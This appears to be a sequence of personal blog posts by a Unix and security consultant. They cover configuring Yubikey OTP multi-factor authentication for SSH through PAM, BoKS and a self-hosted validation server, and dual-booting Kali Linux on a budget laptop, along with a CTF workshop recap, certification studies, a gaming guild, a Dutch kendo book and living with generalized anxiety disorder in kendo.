Downside to this approach is that you lose all fine-grained control that BoKS usually provides over SSH. Upside is that you’re getting a cheap MFA solution :) Use-cases would include your high-privileged system administrators using this daemon for access (as they usually get full SSH* rights through BoKS anyway), or employees who use SSH to specifically access a command-line based application which requires MFA.

The following commands will set up the required configuration files. This list assumes that BoKS is enabled (“sysreplace replace”), because otherwise the placement of the PAM files would be slightly different.

I’ve edited /etc/ssh/yubikey-sshd_config, to simply adjust the port number from “22” to “2222”. Pick a port that’s good for you. At this point, if you start “/usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config” you should have a perfectly normal SSH with Yubikey authentication running on port 2222.

You can ensure that only Yubikey users can use this SSH access by adding “AllowGroups yubikey” to the configuration file (and then adding said Posix group to the relevant users). This ensures that access doesn’t get blown open if BoKS is temporarily disabled.

Finally, we need to adjust the PAM configuration so yubikey-sshd starts using BoKS. I’ve changed the /etc/opt/boksm/pam.d/yubikey-sshd file to read as follows:

#%PAM-1.0
auth      required   pam_sepermit.so
auth      required   pam_yubico.so mode=client ldap_uri=ldap:/// ldapdn= user_attr=uid yubi_attr=yubiKeyId id= key= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth      required   pam_boks.so.1
account   required   pam_boks.so.1
account   required   pam_nologin.so
password  required   pam_boks.so.1
# pam_selinux.so close should be the first session rule
session   required   pam_selinux.so close
session   required   pam_loginuid.so
session   required   pam_boks.so.1
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session   required   pam_selinux.so open env_params
session   optional   pam_keyinit.so force revoke

 

Caveat: public key authentication

Unless you are running OpenSSH 6.x as a daemon (which is NOT included with RHEL6 / CentOS 6), then you must disable public key authentication in /etc/ssh/yubikey-sshd_config. Otherwise, the pubkey authentication will take precedent and the Yubikey will be completely bypassed.

So, edit yubikey-sshd_config to include:

 

Reconfiguring BoKS

The file /etc/opt/boksm/sysreplace.conf determines which configuration files get affected in which ways when BoKS security is either activated or deactivated. Change the “pamdir” line by appending “yubikey-sshd”:

file pamdir relinkdir,copyfiles,softlinkfiles /etc/pam.d $BOKS_etc/pam.d vsftpd remote login passwd rexec rlogin rsh su gdm kde kdm xdm swrole gdm-password yubikey-sshd

The file /etc/opt/boksm/bokspam.conf ties PAM identifiers into BoKS access methods. Whenever PAM sends something to pam_boks.so.1, this file will help in figuring out what BoKS action the user is trying to perform. At the bottom of this file I have added the following line:

yubikey-sshd   YUBIKEY-SSHD:${RUSER}@${RHOST}->${HOST}, login, login_info, log_logout, timeout

The file /etc/opt/boksm/method.conf defines many important aspects of BoKS, including authentication and access “methods”. The elements defined in this file will later appear in “access routes” (BoKS-lingo for rules). At the bottom of this file I have added, which is a modification of the existing SSH_SH method:

METHOD YUBIKEY-SSHD:  user@host->host,    -prompt, timeout, login, noroute, @-noroute, usrqual, uexist, add_fromuser

By now it’s a good idea to restart your adjusted SSH daemon and BoKS. Check the various log files (/var/log/messages, /var/opt/boksm/boks_errlog) for obvious problems.

 

Assigning access

My user account BoKS.MGR:thomas has userclass (BoKS-speak for “role”) “BoksAdmin”. I’ve made two changes to my account (which assumes that group “yubikey” already exists):

This leaves me as follows:

[root@master ~]# lsbks -aTl *:thomas
Username:                     BOKS.MGR:thomas
User ID:                      501
User Classes:                 BoksAdmin
Group ID:                     501
Secondary group ID's:         505 (ALL:yubikey)
[...]
Assigned authenticator(s):    ssh_pk
                              ldapauth
Assigned Access Routes via User Classes
BoksAdmin                     login:*->BOKS.MGR 00:00-00:00, 1234567
                              su:*->root@BOKS.MGR 00:00-00:00, 1234567
                              yubikey-sshd:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567
                              ssh*:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567

 

Proof: Pam_yubico works with pam_BoKS

The screenshot below shows two failed login attempts by user Sarah, who does have a Yubikey but who lacks the Posix group “yubikey”. Below is a successful login by user Thomas who has both a Yubikey and the required group.

yubikey BoKS ssh login failure

The screenshot below shows a successful login by myself, with the resulting BoKS audit log entry.

yubikey ssh BoKS login success


kilala.nl tags: , , ,

View or add comments (curr. 0)

A new project: a private Yubikey server infrastructure

2015-11-14 20:48:00

I was recently gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

I've been playing with the YK for two days now and I've managed to get the following working quite nicely:

I have written an extensive tutorial on how I built the above. In the near future you may expect expansions, including tie-in to LDAP as well as BoKS. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Building a local Yubikey server infrastructure

2015-11-13 23:05:00

I recently was gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

In the next few paragraphs I will explain how I built the following:

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

 

Yubikey infrastructure: how does it all work?

Generally speaking, any system that runs authentication based on Yubikey products, will communicate with the YubiCloud, e.g. the Yubico servers. In a corporate environment this isn’t desirable, which is why Yubico have created an open source, on-premises solution consisting of two parts: ykval and ykksm.

yubikey infrastructure

Any product desiring to use YK authentication will contact the ykval server to verify that the card in question is indeed valid and used by the rightful owner. To achieve this, ykval will contact the ykksm server and attempt to perform an encryption handshake to see if the card truly matches the expected signatures.

Yubico provide open source tools and APIs that help you build YK authentication into your software. In the case of SSH (and other Unix tools), all of this can be achieved through PAM. There are many different options of authenticating your SSH sessions using a Yubikey and I’ve opted to go with the easiest: the OTP, one-time-password, method. I’m told that you can also use YK in a challenge/response method with later versions of OpenSSH. It’s also possible to actually use your YK as a substitute for your SSH/PGP keys.

 

Caveat: AES keys

The AES keys stored in YKKSM cannot be the ones associated with your Yubikey product when they leave the factory. Yubico no longer make these keys available to their customers. Thus, in order to run your own local Yubikey infrastructure, you will be generating your own AES keys and storing them on the Yubikey.

 

Caveat: OpenSSH versions

My whole project revolves around using CentOS 6.7. Red Hat have made certain choices with regards to upgrading and patching of the software that’s part of RHEL and thus 6.x “only” runs OpenSSH 5.2. This means that a few key features from OpenSSH 6.2 (which are great to use YK as optional MFA) are not yet available. Right now we’re in an all-or-nothing approach :)

 

Caveat: SELinux and Yubikey

 

If we have SELinux enabled, it has been suggested that the following tweaks will be needed:

 

Requirements:

On the server(s) you will need to install the following packages through Yum: git-core httpd php mysql-server make php-curl php-pear php-mysql wget help2man mcrypt php-mcrypt epel-release. After making EPEL available, also install “pam_yubico” and “ykclient” through Yum.

On the client(s) you will only need to install both “epel-release” and “pam_yubico” (through EPEL). Installing “ykclient” is optional and can prove useful later on.

On the server(s) you will need to adjust /etc/sysconfig/iptables to open up ports 80 and 443 (https is not included in my current documentation, but is advised).

 

Installation of the server:

EPEL has packages available for both the ykval and the ykksm servers. However, I have chosen to install the software through their GIT repository. Pulling a GIT repo on a production server in your corporate environment might prove a challenge, but I’m sure you’ll find a way to get the files in the right place :D

First up, clone the GIT repos for ykval and ykksm:

 

A few tweaks are now needed:

From this point onwards, you may work your way through the vendor-provided installation guides:

  1. Install guide for YKKSM (also included in GIT)
  2. Install guide for YKVAL (also included in GIT)

More tweaks are needed once you are finished:

Restart both MySQL and Apache, to make sure all your changes take effect.

 

Initial testing of the infrastructure

We have now reached a point where you may run an initial test to make sure that both ykval and ykksm play nicely. First off, you may register a new client API key, for example:

$ ykval-gen-clients --urandom --notes "Client server 2"
5,b82PeHfKWVWQxYwpEwHHOmNTO6E=

This has registered client number 5 (“id”) with the API key “b82PeHfKWVWQxYwpEwHHOmNTO6E=”. Both of these will be needed in the PAM configuration later on. Of course you may choose to reuse the same ID and API key on all your client systems, but this doesn’t seem advisable. It’s possible to generate new id-key pairs in bulk and I’m sure that imaginative Puppet or Chef administrators will cook up a nice way of dispersing this information to their client systems.

You can run the actual test as follows. You will recognize the client ID (“5”) and the API key from before. The other long string, starting with “vvt…” is the output of my Yubikey. Simply tap it once to insert a new string. The verification error shown below indicates that this OTP has already been used before.

$ ykclient —url "http://127.0.0.1/wsapi/2.0/verify" --apikey b82PeHfKWVWQxYwpEwHHOmNTO6E=
     5 vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv --debug
Input:
  validation URL: http://127.0.0.1/wsapi/2.0/verify
  client id: 5
  token: vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv
  api key: b82PeHfKWVWQxYwpEwHHOmNTO6E=
Verification output (2): Yubikey OTP was replayed (REPLAYED_OTP)

For the time being you will NOT get a successful verification, as no Yubikeys have been registered yet.

 

Registering user keys

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

As I mentioned before, you cannot retrieve the AES key for your Yubikey to include in the local KSM. Instead, you will be generating new keys to be used by your end-users. There’s two ways to go about this:

In either case you will need to so-called Yubikey Personalization Tools, available for all major platforms. Using this tool you will either input or generate and then store the new key onto your Yubikey.

 

yubikey personalization tools

 

The good thing about the newer Yubico hardware products is that they have more than one “configuration slot”. By default, the factory will only fill slot 1 with the keys already registered in YubiCloud. This leaves slot 2 open for your own use. Of course, slot 1 can also be reused for your own AES key if you so desire.

It’s mostly a matter of user friendliness:

In my case I’ve generated the new key through the Personalization Tool and then inserted it into the ykksm database in the quickest and dirtiest method: through MySQL.

$ mysql
USE ykksm;
INSERT INTO yubikeys VALUES (3811938, “vvtblilljglk”, “”, "783c8d1f1bb5",
"ca21772e39dbecbc2e103fb7a41ee50f", "00000000", "", 1, 1);
COMMIT;

The fields used above are as follows: `serialnr`, `publicname`, `created`, `internalname`, `aeskey`, `lockcode`, `creator`, `active`, `hardware`. The bold fields were pulled from the Personalization Tool, while the other fields were left default or filled with dummy data. (Yes, don’t worry, all of this is NOT my actual security info)

 

Further testing, does the Yubikey work?

Now that both ykval and ykksm are working and now that we’ve registered a key, let’s see if it works! I’ve run the following commands, all of which indicate that my key does in fact work. As before, the OTP was generated by pressing the YK’s sensor.

$ wget -q -O - ‘http://localhost/wsapi/decrypt?otp=vvtblilljglkkgccvhnrvtvghjvrtdnlbrugrrihhuje'
OK counter=0001 low=75e6 high=fa use=03

 

$ ykclient —url “http://127.0.0.1/wsapi/2.0/verify" --apikey 6YphetClMU1mKme5FrblQWrFt8c=
     4 vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc --debug
Input:
validation URL: http://127.0.0.1/wsapi/2.0/verify
client id: 4
token: vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc
api key: 6YphetClMU1mKme5FrblQWrFt8c=
Verification output (0): Success

 

Making OpenSSH use Yubikey authentication

As I’ve mentioned before, for now I’m opting to use the Yubikey device in a very simple manner: as a second authenticator factor (MFA) for my SSH logins. We will setup PAM and OpenSSH in such a way that any SSH login will first prompt for a Yubikey OTP, after which it will ask for the actual user’s password.

Create /etc/yubikey. This file maps usernames to Yubikey public names, using the following format:

thomas:vvtblilljglk          # :

The great news is that Michal Ludvig has proven that you may also store this information inside LDAP, which means one less file to manage on all your client systems!

Edit /etc/pam.d/sshd and change the AUTH section to include the Yubico PAM module, as follows. Substitute   for the fully qualified hostname assigned to the ykval web server.

auth       required    pam_sepermit.so
auth       required   pam_yubico.so mode=client authfile=/etc/yubikey id=5 key=b82PeHfKWVWQxYwpEwHHOmNTO6E= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth       include      password-auth

Finally edit /etc/ssh/sshd_config and change the following values:

PasswordAuthentication no
ChallengeResponseAuthentication yes

Restart the SSHD and you should be golden!

 

Troubleshooting

When it comes to either ykksm or ykval full logging is available through Apache. If you’ve opted to use the default log locations as outlined in the respective installation guides, then you will find the following files:

[root@master apache]# ls -al /var/log/apache
-rw-r--r--   1 root root 15479 Nov 13 21:53 ykval-access.log
-rw-r--r--   1 root root 36567 Nov 13 21:53 ykval-error.log

These will contain most of the useful messages, should either VAL or KSM misbehave.

 

Video: registering a new key and using it

 

 

Sources:

Aside from all the pages I’ve linked to so far, a few other sites stand out as having been tremendously helpful in my quest to get all of this working correctly. Many thanks go out to:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A cheap laptop as pen-testing portable: Lenovo Ideapad s21e-20 and Kali

2015-10-07 15:00:00

the Lenovo Ideapad s21e-20 Windows 8

In preparation of the recent PvIB penetration testing workshop, I was looking for a safe way to participate in the CTF. I was loathe of wiping my sole computer, my Macbook Air and I also didn't want to use my old Macbook which is now in use as my daughter's plaything. Luckily my IT Gilde buddy Mark Janssen had a great suggestion: the Lenovo Ideapad s21e-20.

Tweakers.net gave it a basic 6,0 out of 10 and I'd agree: it's a very basic laptop at a very affordable price. At €180 it gives me a wonderfully portable system (light and good formfactor), with a decent 11.6" screen, an okay keyboard and too little storage. Storage is the biggest issue for the purposes I had in mind! Biggest annoyance is that the touchpad doesn't work under Linux without lots of fidgetting.

I wanted to retain the original Windows 8 installation on the system, while allowing it to dual-boot Kali Linux. In order to get it completely up and running, here's the process I followed. You will need a bunch of extra hardware to get it all up and running.

So here we go!

  1. Unbox and install as usual. Walk through the complete Windows setup.
  2. Feel free to plug the SDHC microSD card into the storage slot of the laptop. You won't be using it for now, but that way you won't lose it. 
  3. Under Windows Update, disable the optional update for the Windows 10 installer. You don't have enough space for Windows 10 anyway. Then run all required updates, to keep things safe.
  4. Configure Windows as desired :)
  5. Using the partitioning and formatting tool of Windows, cut your C: drive by 1.5GB. Create a new partition on the free space created thusly. 
  6. Download the Kali Linux 32-bit live CD.
  7. Get a tool like Rufus and burn the Kali ISO to the external USB drive.
  8. Restart into UEFI, by using the advanced options menu of the Windows restart. Windows key -> Power icon -> shift-click "restart" -> advanced -> UEFI.
  9. In UEFI go to the "boot" tab. Set the boot mode to "Legacy Support", boot priority to "Legacy first" and USB boot to "enabled". 
  10. Save, then plugin the Wifi dongle on the other USB port and reboot. Boot Kali from the USB drive. 
  11. Once you've booted to the desktop, you're stuck without a mouse :p Press the Windows Flag key on your keybard to popup the search bar. Type "install" and start the Kali installer. 
  12. The installer starts in a new window, but it will only be partially visible! You'll need to navigate using the arrow keys and you'll need to make a few good guesses. For most questions you can use the default value as provided, or confirm the required information using the Enter key.
  13. If you would like to change your Location, the bottom-most option in the list is "Other" which will allow you to select "Europe" and so on.
  14. Once you reach the "Partition disks" screen, choose "Manual".
  15. Your internal storage is /dev/mmcblk0, while the SDHC card in the slot will be /dev/mmcblk1. Ensure that the 1.5GB partition on blk0 is made into /boot as ext4. Also partition the SDHC card to have at least 20GB of / as ext4 and swap (4GB). If desired you may also create a third partition as FAT32, so you can have more scratch space to exchange files between Windows and Linux. 
  16. The bottom-most option in the partitioning screen is "save and continue". Do not mess with TAB etc. Once you're done with the partition tables, just push the down arrow until it keeps beeping and press Enter.
  17. Once asked where to install GRUB, just chuck it on the /dev/mmcblk0 MBR. This kills the Windows 8 default bootloader, but Windows will work just fine. 
  18. Finish the installation by answering the rest of the questions.
  19. Shutdown the laptop, unplug the USB drive and replace it with your USB mouse. Poweron the laptop and boot Kali.

The good thing is that you won't need to mess around with extra settings to actually boot from the SDHC card! On older Ideapad laptops this was a lot of hassle and required extra work to boot from SD

Now, we're almost there!

  1. Follow these instructions to allow GRUB to boot Windows again. At the end use the update-grub command instead of grub2-mkconfig. Use fdisk -l /dev/mmcblk0 to find which partition you need to at to 15_Windows. In my case it was hd0,1. That's the EFI partition. You can reboot to verify that Windows boots again. It will complain that "no operating system was found", but Windows will boot just fine!
  2. The guys at blackMORE Ops have created a nice article titled "20 Things to do after installing Kali Linux". A lot of these additions are very nice, feel free to follow them. 
  3. Follow the Debian Wiki instructions on setting up the WL drivers for the BCM43142 onboard wifi card. Reboot afterwards and unplug the USB wifi dongle before starting back into Linux. Your onboard wifi will now work!
  4. If, like me, you appreciate your night vision go ahead and install F.Lux for Linux. In my case I start it up with: xflux -l 52.4 -g 5.3 -k 2600. You can put that in a small script and include it with the startup scripts of Gnome.  

And there we have it! Your Ideadpad s21e is now dual-booting Windows 8 and Kali Linux. Don't forget to clone the drives to a backup drive, so you won't have to redo all of these steps every time you visit a hacking event :) Just clone the backup back onto the system afterwards, to wipe your whole system (sans UEFI and USB controllers). 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

PvIB Pen.Testing workshop

2015-10-07 06:32:00

The CTF site

Last night I attended PvIB's annual pen-testing event with a number of friends and colleagues. First impressions? It's time for me to enroll as member of PvIB because their work is well worth it!

In preparation to the event I prepared a minimalistic notebook computer with a Windows 8 and Kali Linux dual-boot. Why Kali? Because it's a light-weight and cross-hardware Linux installer that's chock-full of security tools! Just about anything I might need was pre-installed and anything else was an apt-get away. 

Traveling to the event I expected to do some networking, meeting a lot of new people by doing the rounds a bit while trying to pick up tidbits from the table coaches going around the room. Instead, I found myself engrossed in a wonderfully prepared CTF competition. In this case, we weren't running around the conference hall, trying to capture each other's flags :D The screenshot above shows how things worked:

  1. Each participant would register an account on fragzone.nl
  2. Your personal dashboard showed the available challenges, each worth a number of points.
  3. Supposedly easy challenges would net you 50-100 points, while big ones would net 250, 500 or even 1000!
  4. Each challenge would result in a file or piece of text, which one needed to MD5 and then submit through the dashboard.

I had no illusions of my skillset, so I went into the evening to have fun, to learn and to meet new folks. I completely forgot to network, so instead I hung out with a great group of students from HS Leiden, all of whom ended up really high in the rankings. While I was poking around 50-200 point challenges, they were diving deeply into virtual machine images searching for hidden rootkits and other such hardcore stuff. It was great listening to their banter and their back-and-forth with the table coach, trying to figure out what the heck they were up to :)

I ended up in 49th place out of 85 participants with 625 points. That's mostly middle of the pack, while the top 16 scored over 1400 (#1 took 3100!!) and the top 32 scoring over 875. 

Challenges that I managed to tackle included:

Together with Cynthia from HSL, we also tried to figure out:

The latter was a wonderful test and we almost had it! Using various clues from the web, which involved multiple steganography tools provided by Alan Eliason, ImageMagick and VLC. We assumed it was a motion-jpeg image with differences in the three frames detected, but that wasn't it. Turns out it -was- in fact steganography using steghide.

Ironically the very first test proved very annoying to me, as the MD5 sum of the string I found kept being rejected. It wasn't until our coach hinted at ending NULL characters that I switched from "cat $FILE | md5sum" to "echo -n $STRING | md5sum". And that's what made it work. 

To sum things up: was I doing any pen-testing? No. Did I learn new things? Absolutely! Did I have a lot of fun? Damn right! :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

My first foray into pen-testing

2015-09-30 18:23:00

A few days ago, my buddies at IT Gilde were issued a challenge by the PvIB (Platform voor Informatie Beveiliging), a dutch platform for IT security professionals. On October 6th, PvIB is holding their annual pen-testing event and they asked us to join in the fun. I've never partaken in anything of the sorts and feel that, as long as I keep calling myself "Unix and Security consultant", I really ought to at least get introduced to the basics of the subject :)

So here we go! I'm very much looking forward to an evening full of challenges! 

The PvIB folks warn to not have any sensitive or personal materials on the equipment you'll use during the event, so I went with Mark Janssen's recommendation and bought a cheap Lenovo S21e-20 notebook. I'll probably upgrade that thing to Windows 10 and load it up with a wad of useful tools :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Some hard work that I need to pull through!

2015-09-30 17:51:00

Aside from my day to day activities in the fields of Unix/Linux and security, I want to ensure that I keep up with relevant and useful skills. I believe that expanding my horizons and keeping up with tech outside of my usual activities is a very useful activity. As the proverbial "big stick" I challenged myself to achieve two professional certifications this year:

  1. Oracle Certified Associate, for Oracle 11. Many of my activities so far have touched on databases, but my current project's the first time that I've had to actually dive into them. I would like to actually know something about the stuff I'm working with, hence I'd like to achieve at least a basic set of Oracle DBA skills. 
  2. Puppet Professional. Puppet's one of the more recent techs that I feel has a huge future. As the saying goes "I want me some of that!". While I have no current need for Puppet, I am keen to soon get started on a Puppet job!

Of course, the year isn't very long anymore, so I'd better get cracking!


kilala.nl tags: ,

View or add comments (curr. 0)

Inadvertent guild master (Wakfu)

2015-07-24 07:55:29

The Damn Snoofles guild

Explanation: this post is about the MMORPG "Wakfu", which Marli and myself played pretty hardcore for about a year in 2013/2014. This post was made on the Wakfu forums before being posted here.

A year onward, I find myself in the surprising position of acting guild master. The prolonged absence of our founding players and Ankama's automatic transfer system led to this new situation. 

Snoofles are NOT an active guild anymore (and whenever Shaleigh finds the time, he can remove the "recruiting" from this topic's title). Rosa and myself will maintain our Haven World as a testament to our group's glory days. 2013 and 2014 were a wonderful time, but they won't return. 

Rosa and I came in at the high point of the guild and met lots of lovely people. I fondly think back to running dungeons and endlessly sh*t-talking with Ama, Disc and Seniv. I remember Bloody and his army of alts, taking us on Luna runs, to grind levels. I remember the rush by the high-ranking players to gather mats and Kama to build up our HW to its current form. And I also remember the drama that finally broke up the team, the ousting of a few members that led to a split in leadership and the heartache that followed. 

That is why we'll be conservators: Damn Snoofles was our home for a year and we loved playing with all of you.


kilala.nl tags: ,

View or add comments (curr. 0)

Puppet Practitioner course completed

2015-06-24 20:03:00

The past few months I've been hearing more and more about Puppet, software that allows for "easy" centralized configuration management for your servers. Monday through Wednesday were spent getting familiar with the basics of the Puppet infrastructure and of how to manage basic configuration settings of your servers. It was an exhausting three days and I've learned a lot!

The course materials assumed that one would make use of the teacher's Puppet master server, while having a practice VM on their own laptop (or on the lab's PC). As I'm usually pretty "balls to the wall" about my studying, I decided that wasn't enough for me :p

Over the course of these three days I've set up a test environment using multiple VMs on my Macbook, running my own Puppet master server, two Linux client systems and a Windows 8 client system. The Windows system provided the most challenges to me as I'm not intimately familiar with the Windows OS. Still, I managed to make all of the exercises work on all three client systems! 

Many thanks to the wonderful Ger Apeldoorn for three awesome days of learning!


kilala.nl tags: , , ,

View or add comments (curr. 0)

First attempt at SQL exam: did not pass

2015-06-19 07:59:00

After roughly three months of studying (at night and on the train) I took a gamble: last night I took my Oracle SQL exam 1Z0-051. Along the way I've learned two things:

  1. The contents of the exam are rather different (and more difficult!) from the practice exams and study materials that came with the two books I have.
  2. It's not a good idea to attempt the online exam at 23:00, after a long day of work and an evening of studying :D

I'm going to "deflate" for a few weeks before continuing my studies. I really, really want to achieve my OCA before the end of the year, so I'd better get a hurry on after that.

But first, my first three days of Puppet training! More exciting new things to learn!


kilala.nl tags: ,

View or add comments (curr. 0)

Branching out, learning about databases

2015-03-01 13:52:00

Since achieving my RHCE last November I've taken things easy: for three months I've done nothing but relaxing and gaming to wind down from the big effort. But now it's time to pick up the slack again!

Over the past years I've worked with many Unix systems and I've also worked with with monitoring, deployment and security systems. However, I've never done any work with databases! And that's changed now that I'm in a scrum team that manages an application which runs on Websphere and Oracle. So here I go! I really want to know what I'm working with, instead of just picking up some random terms left and right. 

Starting per March, I'm studying Oracle 11. And to keep myself motivated I've set myself the goal of achieving basic Oracle certification, which in this case comes in the shape of the OCA (Oracle Certified Associate). The certification consists of two exams: a database technology part and an SQL part, the latter of which may be taken online.

This is going to be very challenging for me, as I've never been a good programmer. Learning SQL well enough to write the small programs associated with the exam is going to be exciting but hard :)


kilala.nl tags: ,

View or add comments (curr. 0)

Passed my RHCE

2014-11-11 09:16:00

Snoopy is happy

Huzzah! I passed, with a score of 260 out of 300... That makes it roughly 87%, which is an excellent ending to four months of hard prepwork.

The great thing is that I'm now able to rack up 85 CPE for my CISSP! 25 points in domain A and 60 points in domain B, which means that my CISSP renewal for this year and the next two is a basic shoe-in. Of course, I'll continue my training and studies :)

My RHCE experience was wonderful. Like last year with my RHCSA, I took the Red Hat Kiosk exam in Utrecht.

A while back I was contacted by Red Hat, to inform me I'm a member Red Hat 100 Kiosk Club which basically means that I'm one of the first hundred people in Europe to have taken a Kiosk exam. As thanks for this, they offered me my next Kiosk exam for free, which was yesterday's RHCE. Nice!

The exam was slated for 10:00, I showed up at 09:30. The reception at BCN in Utrecht was friendly, with free drinks and comfy seats to wait. The Kiosk setup was exactly as before, save the slot for my ID card which was already checked at the door. The keyboard provided was pretty loud, so I'm sorry to the other folks taking their exams in the room :)

All in all I came well prepared, also with thanks to my colleagues for sharing another trial exam with me.


kilala.nl tags: , ,

View or add comments (curr. 0)

Let's do this!

2014-11-09 15:15:00

RHCE exam in 18 hours

If I'm not ready by now, nothing much will help :)

Looking forward to taking the RHCE exam tomorrow and whichever way it goes, I'm also looking forward to the SELinux course I'll be taking at IT Gilde tomorrow night. 


kilala.nl tags: , ,

View or add comments (curr. 0)

RHCE exams, here I come

2014-07-29 21:32:00

Yes, this blog has been quiet for quite a while. In part this is because I've put most of my private stuff behind logins, but also because I've had my professional development on a backburner due to my book translation. 

But now I've started studying for my RHCE certification. A year ago (has it been that long?!) I achieved my RHCSA, which I'll now follow up with the Engineer's degree. Red Hat will still offer the RHEL6 exams until the 19th of december, so I'd better get my ass in gear :)


kilala.nl tags: , ,

View or add comments (curr. 0)

F.Lux on Linux: oh happy day!

2014-07-29 21:27:00

Oh happy day! I've been using F.Lux on my Macs for years now and my eyes thank me for it. This great piece of software will automatically adjust the color temperature of your computer's screen, based on your location and light in your surroundings. 

During the day your screen's white will be white, but in the evenings it'll slowly turn much more orange. During this change you won't even notice it's happening, but the end result is awesome. You'll still be seeing "white" but with much less eyestrain. Even better: supposedly the smaller amount of blue light will help in falling asleep later on. 

Now that I've started studying for my RHCE exams, I'm working extensively on CentOS again. Hellooooo bright light! 

But not anymore. Turns out that xflux is a thing! It's a Linux daemon that quite literally is F.Lux, for Linux. No more burnt out corneas! 


kilala.nl tags: , ,

View or add comments (curr. 0)

Dutch kendo kata book (Nederlandstalig kendo kata boek)

2014-05-21 14:53:00

Historically, the western kendoka has had a tough time finding books and materials to study in his native language. It is only natural that most texts on the subject of kendo and kendo kata are published in the Japanese language.

The Netherlands and Belgium could be considered a very small market for kendo-related books. Thus, the only kendo books in the dutch language that I am aware of are Louis Vitalis-sensei‘s book and the translation of Jeff Broderick’s book.

 

A dutch kendo kata book

It is with great pleasure that we announce the publication of a brand new, dutch kendo book.

Nihon Kendo no Kata & Kihon Bokuto Waza” is a translation of Stephen Quinlan-sensei‘s essay on both the traditional kendo kata and on the modern set of waza practices with bokuto. Thomas Sluyter translated the book into the dutch language, in cooperation with Quinlan-sensei.

 

 

 

Availability

The book is available both in print and as a free ebook.

The original, english version can be obtained here.

 

Contents

The following subjects are covered:

 

About the book

As teachers at the Kingston Kendo Club in Canada, Stephen and Christina Quinlan have written many study materials for their students. One of their largest bodies of work is this particular book, “Nihon Kendo no Kata & Kihon Bokuto Waza“. The book combines literal, technical descriptions of each kata with deep backgrounds on the history, and the philosophy behind the kata. Many books by esteemed teachers were referenced to build this comprehensive body of knowledge.

Thomas Sluyter is a relatively new student of kendo at Renshinjuku Kendo in Amstelveen, the Netherlands. As an avid reader of kendo books, he felt that this particular book should be read by as many Dutch kendoka as possible.


kilala.nl tags: ,

View or add comments (curr. 0)

Living with shikai: generalised anxiety disorder in kendo

2014-03-15 22:01:00

To retain heijoshin (an even mind) is one of the greater goals in kendo.

Heijoshin reflects a calm state of mind, despite disturbing changes around you. [It] is the state of mind one has to strive for, in contrast to shikai, or the 4 states of mind to avoid:

  1. Kyo: surprise, wonder
  2. Ku: fear
  3. Gi: doubt
  4. Waku: confusion, perplexity

(Buyens, 2012)

In the following pages I would like to introduce you to generalized anxiety disorder, hereafter “GAD”. For sufferers of GAD every day is filled with two of these shikai: fear and doubt. While I am but a layman I do hope that my personal experiences will be of use to those dealing with anxiety disorders in the dojo. I will start off by explaining the medical background of GAD, followed by my personal experiences. I will finish the article by providing suggestions to students and teachers dealing with anxiety in the dojo.

 

Anxiety disorders: definition and treatment

All of us are familiar with anxiety and fear as they are basic functions of the human body. You are startled by a loud noise, you jump away from a snapping dog and you feel the pressure exuded by your opponent in shiai. They prepare your body for what is called the “fight or flight” reaction: either you run for your life, or you stand your ground and fight tooth and nail. These instincts become problematic if they emerge without any reasonable stimulus. The most famous type of such a disorder are phobias, the fear of specific objects or situations, which are suggested to occur in ~25% of the adult US population. (Rowney, Hermida, Malone, 2012)

Other types of anxiety disorders are:

For the remainder of this article I will focus on the disorder with which I have personal experience: generalized anxiety disorder.

Perhaps the easiest ways to describe GAD is to use an analogy: GAD is to worry, as depression is to “feeling down”. Just like a depressed person cannot “simply get over it” and is debilitated in his daily life, so does a person with GAD live with constant worry. As it was described by comic artist Mike Krahulik:

The medication I picked up today said it could cause dizziness. […] I had to obsess over it all afternoon: I drove to work today by myself, will I be able to drive home? What if I can’t? How will I know if I can’t? Should I call the doctor if I get dizzy? How dizzy is too dizzy? What if the doctor isn’t there? Will I need to go to the hospital? Should I get a ride home? I can’t leave my car here overnight. The garage closes at 6 what will I do with my car? What if Kara can’t come get me? Should I ask Kiko for a ride home? If I get dizzy does that mean it’s working? Does that mean it’s not working? What if it doesn’t work?” (Krahulik, 2008)

Paraphrased from DSM-IV-TR (footnote 1) and from Rowney, Hermida, Malone, criteria for GAD are that the person has trouble controlling worries and is anxious about a variety of events, more than 50% of the time, for a duration of at least 6 months. These worries must not be tied to a specific anxiety or phobia and must not be tied to substance abuse. The person exhibits at least three of the following symptoms: restlessness, exhaustion, difficulty concentrating, irritability, muscle tension and sleep disturbance.

Thus the symptoms differ per person, as does the potency of an episode. In severe cases of GAD episodes will result in what is known as a panic attack, which you could describe as a ten-minute bout of super-fear. Effects of a panic attack may include palpitations, cold sweat, spasms and cramps, dizziness, confusion, aggressiveness and hyperventilation. Because of these effects, people having a panic attack may think they are having a heart attack or that they are going plain crazy.

